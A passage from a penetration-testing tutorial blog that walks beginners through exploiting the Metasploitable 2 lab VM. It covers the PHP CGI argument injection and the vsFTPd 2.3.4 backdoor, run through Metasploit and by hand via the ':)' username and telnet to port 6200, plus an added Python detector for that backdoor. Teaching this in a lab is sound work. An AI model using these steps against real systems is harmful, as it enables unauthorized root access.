address>>/phpinfo.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-5Hf-HKXF43Q/V-47Sk6U5lI/AAAAAAAACo0/VMgrxyqETAovZ5uxxxWYXAwTy3uB6jU0QCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://4.bp.blogspot.com/-5Hf-HKXF43Q/V-47Sk6U5lI/AAAAAAAACo0/VMgrxyqETAovZ5uxxxWYXAwTy3uB6jU0QCEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">As you can see from that page, there is a lot of
information. Take a look at the PHP version. </span><span style="font-family: "trebuchet ms" , sans-serif;">After googling that version for any vulnerabilities, we can
find that it is vulnerable to a <a href="https://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection" target="_blank">PHP CGI Argument Injection</a>.</span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Using the PHP CGI Argument Injection Exploit Module</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: msfconsole<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Now let’s search for that exploit: Enter the command: Search
php_cgi<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-l2LtTVFVRxw/V-47TGbigyI/AAAAAAAACo4/RMetvjRrAYIO-gWHBnsQNftUoNuPjvX8gCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="https://4.bp.blogspot.com/-l2LtTVFVRxw/V-47TGbigyI/AAAAAAAACo4/RMetvjRrAYIO-gWHBnsQNftUoNuPjvX8gCEw/s400/3.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Use the exploit and show options:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-KbrLM6bv4gY/V-47ToavMMI/AAAAAAAACpA/MkyTIrhSSose_K-GcBwDCeSXyh-HMgSawCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://4.bp.blogspot.com/-KbrLM6bv4gY/V-47ToavMMI/AAAAAAAACpA/MkyTIrhSSose_K-GcBwDCeSXyh-HMgSawCEw/s400/4.PNG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">RHOST is empty, set the RHOST by using command: set RHOST <<target IP address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">You’re good to go. Exploit. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-NpLxDLsgZrU/V-47TjoEMCI/AAAAAAAACpE/QQnDcFP9zy8rSnMQcVhllq4EWdKMjHcjQCEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://3.bp.blogspot.com/-NpLxDLsgZrU/V-47TjoEMCI/AAAAAAAACpE/QQnDcFP9zy8rSnMQcVhllq4EWdKMjHcjQCEw/s400/5.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;">You got a session. </span></o:p></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></o:p></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;">What can you do with this? I leave that up to you to do some quick research on commands you can use on the <a href="https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/" target="_blank">meterpreter shell</a>. </span></o:p></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></o:p></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></o:p></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></o:p></div>
<h2>Pwning Metasploitable 2: Exploiting the Vulnerable vsFTPd 2.3.4 service (Automatically)</h2>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Posted by <a href="http://www.blogger.com/profile/00209381489830183839" target="_blank">Jayesh</a> on 2016-09-29 (updated 2016-10-12)</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">On our previous article we learnt how to exploit the service
manually. You can find that article <a href="http://edublog.bitcrack.net/2016/09/pwning-metasploitable-2-exploiting.html" target="_blank">here</a>. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Now let’s check out how exploit it without having to do it manually. We will exploit it using the <a href="https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor" target="_blank">vsFTPd 2.3.4 Backdoor Command Execution</a> exploit module. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://www.metasploit.com/" target="_blank">Metasploit</a> is a penetration testing application. It can run
scans with nmap, check for vulnerabilities on target host, and allows for easy
exploit execution. It holds a database of exploits which are ready to load and
execute on the target host. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Starting <a href="https://www.offensive-security.com/metasploit-unleashed/msfconsole/" target="_blank">Metasploit Console</a></span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: msfconsole<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-ArVvfYy9ysY/V-zqtOm5FVI/AAAAAAAACoM/WoUp5pa-GN8EUokfn_-3g4iKnPZdNEW8ACLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://2.bp.blogspot.com/-ArVvfYy9ysY/V-zqtOm5FVI/AAAAAAAACoM/WoUp5pa-GN8EUokfn_-3g4iKnPZdNEW8ACLcB/s400/1.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">The “msf> ” shows that you are now interacting with the metasploit
console.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Searching for vsFTPd exploits</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: search vsftpd<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command tells metasploit to search any exploits for
vsftpd<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/--i9GvK0olIw/V-zqs0y8DKI/AAAAAAAACoI/M02iW684rMAqHhT86L11LawOy1PTTdZiACEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://2.bp.blogspot.com/--i9GvK0olIw/V-zqs0y8DKI/AAAAAAAACoI/M02iW684rMAqHhT86L11LawOy1PTTdZiACEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">The results show that we have an exploit for it in our
metasploit database. From the description we can learn that the exploit is
meant for the vsFTPd v2.3.4. And from the name we know that the exploit is
located in the “exploit/unix/ftp/” directory. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Using the exploit</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: use /exploit/unix/ftp/vstfpd_234_backdoor</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command gets the exploit ready for you.We now need to give it a target to execute on. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-On8DVA5okvI/V-zqs4AeCoI/AAAAAAAACoE/nw17rq0GGsQi6kdaGYOxYGPRjnSbTL0mgCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="21" src="https://1.bp.blogspot.com/-On8DVA5okvI/V-zqs4AeCoI/AAAAAAAACoE/nw17rq0GGsQi6kdaGYOxYGPRjnSbTL0mgCEw/s400/3.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Setting target on the exploit</span></h3>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: show options<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command opens up all the options you can give to the exploit.
<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-t8pUc3pzuug/V-zqtWygFmI/AAAAAAAACoU/ic9nVv4_7PwwtGnW6tGRr_anlhRB-0k3gCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://2.bp.blogspot.com/-t8pUc3pzuug/V-zqtWygFmI/AAAAAAAACoU/ic9nVv4_7PwwtGnW6tGRr_anlhRB-0k3gCEw/s400/4.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We can see 2 options; RHOST and RPORT. Both of them are
required but the RHOST is empty. RHOST is short for Remote Host a.k.a target
address. We need to give it the target address.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: set RHOST <<target IP
address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-SeB1abrlRCA/V-zqtakZ83I/AAAAAAAACoQ/9Cc36jyLFY83IpmLBDJiMjE7slNWvZpVQCEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="32" src="https://4.bp.blogspot.com/-SeB1abrlRCA/V-zqtakZ83I/AAAAAAAACoQ/9Cc36jyLFY83IpmLBDJiMjE7slNWvZpVQCEw/s400/5.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: show options <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">To see whether the target is set and any other remaining
required options that need to be set. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-WZWa19EzNFc/V-zqtrupGkI/AAAAAAAACoY/uxDkmUa72UgCi1ckB_j6SYogE7aiMZh4wCEw/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://4.bp.blogspot.com/-WZWa19EzNFc/V-zqtrupGkI/AAAAAAAACoY/uxDkmUa72UgCi1ckB_j6SYogE7aiMZh4wCEw/s400/6.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Looks like all is set. We now just need to execute the
exploit. We can do that by entering the command: exploit (or run). <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Running the set exploit</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-dSTaZk3xWm8/V-zquOL6p9I/AAAAAAAACoc/hM6jLeLKlvgkSEWylZ0nFxYZitz1BxJpgCEw/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://3.bp.blogspot.com/-dSTaZk3xWm8/V-zquOL6p9I/AAAAAAAACoc/hM6jLeLKlvgkSEWylZ0nFxYZitz1BxJpgCEw/s400/7.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<br />
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This now gives you your backdoored shell :)</span><o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-30538525641603600302016-09-29T02:45:00.000-07:002016-10-12T03:14:06.504-07:00Pwning Metasploitable 2: Exploiting the Vulnerable vsFTPd 2.3.4 service (Manually)<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">I assume from the previous article that you did some
research on the vulnerable FTP service (<a href="https://security.appspot.com/vsftpd.html" target="_blank">vsFTPd 2.3.4</a>).<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">A quick intro to what an exploit is: <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">An exploit is a piece of code that takes advantage of a
security gap in an application's code. In the case of vsFTPd 2.3.4, an intruder
modified the original vsFTPd 2.3.4 source code so that it opens a backdoor
if the username entered ends with the characters “:)”. The backdoored
version then starts listening for connections on port 6200.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Let's check it out for ourselves.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Fire up your <a href="https://www.kali.org/" target="_blank">Kali</a> and <a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2</a>. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We will skip the host
discovery part, as we have already covered it in earlier articles and want to avoid repetition.
You can find it <a href="http://edublog.bitcrack.net/2016/09/pwning-metasploitable-2-scoping-out.html" target="_blank">here</a>. <o:p></o:p></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span><span style="font-family: "trebuchet ms" , sans-serif;">Check the status of port 6200</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: nmap -p 6200 <<target IP
address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command with the “-p” flag tells nmap to scan only port 6200
on the given target IP address.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-rXLVls8ZcYY/V-zhwHxNRoI/AAAAAAAACns/pD-DSirI_dcfxX3Y6Ki9HKy0t9oEMutLQCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="https://1.bp.blogspot.com/-rXLVls8ZcYY/V-zhwHxNRoI/AAAAAAAACns/pD-DSirI_dcfxX3Y6Ki9HKy0t9oEMutLQCLcB/s400/1.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">The results show that the port is closed and there is no
service running on it. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Activating the backdoored vsFTPd 2.3.4</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: telnet <<target IP address>>
21<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Note that “21” in the above command refers to the port
number the FTP service is running on. </span><span style="font-family: "trebuchet ms" , sans-serif;">After the command is executed, you are prompted to enter a
username and password to access the system.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-zhKlpmT8h5s/V-zhwPFKW0I/AAAAAAAACno/ncz6xj-IWQMGPSQ15I-GGTxl0WzyVEDawCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://3.bp.blogspot.com/-zhKlpmT8h5s/V-zhwPFKW0I/AAAAAAAACno/ncz6xj-IWQMGPSQ15I-GGTxl0WzyVEDawCEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">You can type anything as the username, as long as it ends with the
2 characters “:)”, and you will activate the backdoor. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Check the current status of port 6200</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Let's now check the current status of port 6200 with the command:</span><span style="font-family: "trebuchet ms" , sans-serif;"> nmap -p 6200 <<target IP
address>></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-nJg0dZlnEqw/V-zhwak7R8I/AAAAAAAACnw/3aWSaux3Afcz54YfKMINBak2pIzgf38CwCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="https://2.bp.blogspot.com/-nJg0dZlnEqw/V-zhwak7R8I/AAAAAAAACnw/3aWSaux3Afcz54YfKMINBak2pIzgf38CwCEw/s400/3.PNG" width="400" /></a></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Voila! The port is now open. <o:p></o:p></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span><span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://technet.microsoft.com/en-us/library/cc739101(v=ws.10).aspx" target="_blank">Telnet</a> into port 6200</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter command: telnet <<target IP address>> 6200<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Once connected, type in “id” to see which user you
are running as. <o:p></o:p></span></div>
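<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">As an added example (not part of the original post), here is a defender-side check for what was just walked through: it flags FTP USER commands carrying the “:)” trigger in vsftpd-style log lines, and checks an ss -ltn style listener table for a listener on port 6200. The log format, client addresses and listener table are all constructed for illustration.</span></div>

```python
"""Added example: spot the vsFTPd 2.3.4 backdoor trigger in FTP command logs
and check whether something has started listening on the backdoor port.
All sample data below is constructed; it is not real vsftpd or ss output."""
import re
from typing import Iterable, List, Tuple

BACKDOOR_TRIGGER = ":)"   # the username sequence the backdoored build reacts to
BACKDOOR_PORT = 6200      # the port the backdoored daemon starts listening on

# Constructed sample lines in the style of vsftpd's log_ftp_protocol output;
# a real vsftpd.log may differ in detail, these are illustrative only.
SAMPLE_FTP_LOG = """\
Thu Sep 29 09:41:02 2016 [pid 3102] CONNECT: Client "192.168.56.133"
Thu Sep 29 09:41:05 2016 [pid 3102] FTP command: Client "192.168.56.133", "USER alice"
Thu Sep 29 09:41:05 2016 [pid 3102] FTP response: Client "192.168.56.133", "331 Please specify the password."
Thu Sep 29 09:42:10 2016 [pid 3110] CONNECT: Client "192.168.56.133"
Thu Sep 29 09:42:13 2016 [pid 3110] FTP command: Client "192.168.56.133", "USER whatever:)"
Thu Sep 29 09:43:00 2016 [pid 3115] FTP command: Client "192.168.56.20", "USER bob"
"""

# Constructed 'ss -ltn' style listener table as the host would show it after
# the trigger: port 21 is the real FTP service, port 6200 is the backdoor.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       32      0.0.0.0:21           0.0.0.0:*
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       1       0.0.0.0:6200         0.0.0.0:*
"""

USER_CMD_RE = re.compile(r'Client "(?P<client>[^"]+)", "USER (?P<user>[^"]*)"')
LISTEN_RE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+\S*:(?P<port>\d+)\s')


def is_backdoor_username(user: str) -> bool:
    """The post describes the trigger as a username ending in ':)'.  Flagging
    any username that contains the sequence covers that case, and no
    legitimate account name should contain it anyway."""
    return BACKDOOR_TRIGGER in user


def find_backdoor_logins(log_lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (client, username) pairs whose USER command carried the trigger."""
    hits = []
    for line in log_lines:
        m = USER_CMD_RE.search(line)
        if m and is_backdoor_username(m.group("user")):
            hits.append((m.group("client"), m.group("user")))
    return hits


def listening_ports(ss_lines: Iterable[str]) -> List[int]:
    """Extract the local ports in LISTEN state from 'ss -ltn' style output."""
    ports = []
    for line in ss_lines:
        m = LISTEN_RE.match(line)
        if m:
            ports.append(int(m.group("port")))
    return ports


def backdoor_listener_present(ss_lines: Iterable[str]) -> bool:
    """Host-side equivalent of the post's 'nmap -p 6200' before/after check."""
    return BACKDOOR_PORT in listening_ports(ss_lines)


if __name__ == "__main__":
    for client, user in find_backdoor_logins(SAMPLE_FTP_LOG.splitlines()):
        print(f"backdoor trigger from {client}: USER {user!r}")
    print("port 6200 listening:",
          backdoor_listener_present(SAMPLE_SS_OUTPUT.splitlines()))
```

A trigger hit in the FTP log followed by a listener on 6200 is the same before/after picture the nmap screenshots show, seen from the host side.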
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-iTokMvAtX_8/V-zhw57k_uI/AAAAAAAACn0/VCYeqpV3VBolhYdrUh1oZvCgxkVEUEQqACEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="61" src="https://4.bp.blogspot.com/-iTokMvAtX_8/V-zhw57k_uI/AAAAAAAACn0/VCYeqpV3VBolhYdrUh1oZvCgxkVEUEQqACEw/s400/4.PNG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">With root access you can wreak plenty of havoc.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">I will leave it up to you to research telnet commands and
how to use them. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-26648621093298606192016-09-28T03:41:00.000-07:002016-10-12T03:10:09.277-07:00Pwning Metasploitable 2: Scoping out Target<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Fire up your <a href="https://www.kali.org/" target="_blank">Kali</a> attacker machine and your new
<a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2</a> machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Seeing a black screen with white text when firing up Metasploitable
2? You are in the right place. Metasploitable 2 has no GUI for you to click
around in. It is entirely command-line driven, which will help you improve your command line skills. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Here's how your screen should look:</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
